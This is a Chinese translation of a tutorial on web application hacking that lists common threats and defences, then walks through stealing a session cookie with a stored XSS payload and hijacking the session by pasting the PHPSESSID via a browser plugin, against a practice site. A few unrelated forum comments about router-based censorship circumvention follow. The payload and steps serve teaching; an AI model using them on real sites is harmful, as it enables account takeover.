黑客如何破解网站:在线示例
说明比以往任何时候都有更多人访问互联网。这促使许多组织开发基于Web的应用程序,用户可以在线使用该组织与组织进行交互。编写糟糕的Web应用程序代码可能会被利用来对敏感数据和Web服务器进行未经授权的访
谷歌已收录,更新于2019年03月31日; 如遇到问题,请留言及时通知站长; 欢迎加入 三生三世,讨论各种问题!
说明
比以往任何时候都有更多人访问互联网。这促使许多组织开发基于Web
的应用程序,用户可以在线使用该组织与组织进行交互。编写糟糕的Web应用程序代码可能会被利用来对敏感数据和Web服务器进行未经授权的访问。
在本文中,我们将向您介绍Web应用程序黑客技术以及您可以采取的措施,以防止此类攻击。
什么是Web应用程序?什么是网络威胁?
Web
应用程序(aka
网站)是基于客户端 - 服务器模型的应用程序。服务器提供数据库访问和业务逻辑。它托管在Web
服务器上。客户端应用程序在客户端Web
浏览器上运行。Web
应用程序通常用Java
,C#
和VB.Net
,PHP
,ColdFusion
标记语言等语言编写.Web
应用程序中使用的数据库引擎包括MySQL
,MS SQL Server
,PostgreSQL
,SQLite
等。
大多数Web
应用程序都托管在可通过Internet
访问的公共服务器上。这使得它们易于访问,因此容易受到攻击。以下是常见的Web
应用程序威胁。
- SQL注入 - 此威胁的目标可能是绕过登录算法,破坏数据等。
- 拒绝服务攻击 - 此威胁的目标可能是拒绝合法用户访问资源
- 跨站点脚本XSS - 此威胁的目标可能是注入可在客户端浏览器上执行的代码。
- Cookie /会话中毒 - 此威胁的目标是通过攻击者修改
Cookie
/会话数据以获取未经授权的访问权限。 - 表单篡改 - 此威胁的目标是修改表单数据,例如电子商务应用程序中的价格,以便攻击者可以以较低的价格获得项目。
- 代码注入 - 此威胁的目标是注入可在服务器上执行的
PHP
,Python
等代码。代码可以安装后门,泄露敏感信息等。 - 破坏 - 此威胁的目标是修改网站上显示的页面,并将所有页面请求重定向到包含攻击者消息的单个页面。
如何保护您的网站免受黑客攻击?
组织可以采用以下策略来保护自己免受Web服务器攻击。
- SQL注入 - 在将用户参数提交到数据库进行处理之前清理和验证用户参数有助于降低通过
SQL
注入攻击的可能性。MS SQL Server
,MySQL
等数据库引擎支持参数和预处理语句。它们比传统的SQL
语句更安全 - 拒绝服务攻击 -如果攻击是简单的DoS,防火墙可用于从可疑IP地址中删除流量。正确配置网络和入侵检测系统还有助于降低DoS攻击成功的可能性。
- 跨站点脚本 -验证和清理标头,通过URL传递的参数,表单参数和隐藏值可以帮助减少
XSS
攻击。 - Cookie /会话中毒 - 可以通过加密Cookie的内容,在一段时间后将
Cookie
超时,将Cookie
与用于创建Cookie
的客户端IP
地址相关联来防止这种情况。 - 表单篡改 -这可以通过在处理之前验证和验证用户输入来防止。
- 代码注入 -可以通过将所有参数视为数据而不是可执行代码来防止这种情况。可以使用清理和验证来实现此目的。
- 破坏 -一个好的Web应用程序开发安全策略应该确保它密封常用的漏洞来访问
Web
服务器。在开发Web
应用程序时,这可以是操作系统,Web
服务器软件和最佳安全实践的正确配置。
黑客活动:破解网站
在这个实际场景中,我们将劫持位于www.techpanda.org
的Web
应用程序的用户会话。我们将使用跨站点脚本来读取cookie
会话ID
,然后使用它来模拟合法的用户会话。
假设是攻击者可以访问Web
应用程序,并且他想劫持使用相同应用程序的其他用户的会话。假设攻击者的访问帐户是有限访问帐户,此攻击的目标可能是获取对Web
应用程序的管理员访问权限。
入门
- 打开
http://www.techpanda.org/
- 出于实践目的,强烈建议使用SQL注入获取访问权限。有关如何执行此操作的详细信息,请参阅本站下一篇文章。
- 登录电子邮件是
[email protected]
,密码是Password2010
- 如果您已成功登录,那么您将获得以下仪表板
单击“添加新联系人”
输入以下作为名字
<a href=# onclick=\"document.location=\'http://techpanda.org/snatch_sess_id.php?c=\'+escape\(document.cookie\)\;\">Dark</a>
这里,
上面的代码使用JavaScript。它添加了一个带有onclick事件的超链接。当毫无戒心的用户单击该链接时,该事件将检索PHP cookie
会话ID
并将其与URL
中的会话ID
一起发送到snatch_sess_id.php
页面
- 输入其余详细信息,如下所示
- 单击“保存更改”
- 您的仪表板现在看起来像以下屏幕
- 由于跨站点脚本代码存储在数据库中,因此每次具有访问权限的用户登录时都会加载它
- 假设管理员登录并点击显示为
Dark
的超链接 - 他/她将获得
URL
中显示会话ID
的窗口
注意:脚本可能会将值发送到存储PHPSESSID
的某个远程服务器,然后用户重定向回网站,就好像什么也没发生一样。
注意:您获得的值可能与本教程中的值不同,但概念是相同的
使用Firefox和Tamper Data插件进行会话模拟
下面的流程图显示了完成此练习必须采取的步骤。
- 您将需要此部分的
Firefox Web
浏览器和Tamper Data
插件 - 打开Firefox并安装add,如下图所示
- 搜索篡改数据
tamper data
,然后单击安装,如上所示
- 单击接受并安装...
- 安装完成后,单击立即重新启动
- 如果未显示,请在
Firefox
中启用菜单栏
- 单击工具菜单,然后选择防篡改数据,如下所示
- 您将获得以下窗口。注意:如果
Windows
不为空,请点击清除按钮
- 单击
Start Tamper
菜单 - 切换回
Firefox Web
浏览器,输入http://www.techpanda.org/dashboard.php
,然后按回车键加载页面 - 您将从
Tamper Data
中弹出以下内容
弹出窗口有三(3)个选项。“篡改”Tamper
选项允许您在将HTTP标头信息提交到服务器之前修改它。
点击它
您将看到以下窗口
复制从攻击URL
复制的PHP
会话ID
,并在等号后粘贴它。应该是这样的
PHPSESSID=2DVLTIPP2N8LDBN11B2RA76LM2
单击“确定”按钮
您将再次获得Tamper
数据弹出窗口
- 取消选中“继续篡改”复选框?
- 完成后单击“提交”按钮
- 您应该能够看到仪表板,如下所示
注意:我们没有登录,我们使用我们使用跨站点脚本检索的PHPSESSID
值来模拟登录会话
内容提要
- Web应用程序基于服务器 - 客户端模型。客户端使用Web浏览器访问服务器上的资源。
- Web应用程序通常可通过Internet访问。这使他们容易受到攻击。
- Web应用程序威胁包括SQL注入,代码注入,XSS,污损,Cookie中毒等。
- 开发Web应用程序时的良好安全策略可以帮助确保它们的安全。
译文渠道
英文站:https://www.guru99.com/how-to-hack-website.html
译者:黑冰技术站-枂下
您好,看到您说现在都玩路由器翻墙了,请问能不能简短准确地总结下路由器翻墙要点。我爸直接闹闹的现在智能路由器能翻墙了,要不要买个智能路由器。我直觉没这么简单,是不是还是要购买vps建立酸酸乳然后“里应外合”?还要刷路由器,才能真正智能路由器翻墙?请科普下。
其实没那么难,普通的路由器想要实现比较困难,但如果你用的梅林固件或者openwrt的话直接就有翻墙插件实现路由器层面的翻墙。没有VPS的话可以去机场啊,或者找我也行 :roll:
不得不要跪拜谢谢你下,就冲这份心,能不能说下,如何找“机场”?举手google注册了有一键功能,现在注册还来得及么?
你可以加我qq交流一下 1138556414
沙发 :roll: